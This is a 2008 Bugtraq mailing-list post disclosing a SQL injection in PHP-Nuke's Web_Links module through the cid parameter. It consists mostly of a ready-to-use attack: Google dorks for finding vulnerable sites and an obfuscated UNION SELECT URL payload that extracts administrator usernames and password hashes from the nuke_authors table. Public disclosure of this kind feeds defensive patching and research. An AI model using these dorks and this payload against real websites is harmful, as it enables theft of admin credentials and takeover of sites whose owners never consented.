Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista
PHP-Nuke Module Web_Links SQL Injection(cid) Feb 19 2008 08:26PM
hackturkiye hackturkiye gmail com
###############################################################

#

# PHP-Nuke Module Web_Links SQL Injection(cid)

#

###############################################################

#

# AUTHOR : S@BUN

#

# HOME 1 : http://www.milw0rm.com/author/1334

#

# MAİL : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

################################################################

#

# DORK 1 : allinurl: file-index modules-php-op-modload-name-Web_Links "l_op viewlink"

#

DORK 2 : allinurl: cid file-index modules-php-op-modload"l_op viewlink"name-Web_Links

################################################################

example :

http://XXX/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlin
k&cid= (exploit)

EXPLOİT

modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-0000
0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,11
2,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20ad
min%201=%202

################################################################

# S@BUN i AM NOT HACKER S@BUN

################################################################

[ reply ]




 

Privacy Statement
Copyright 2008, SecurityFocus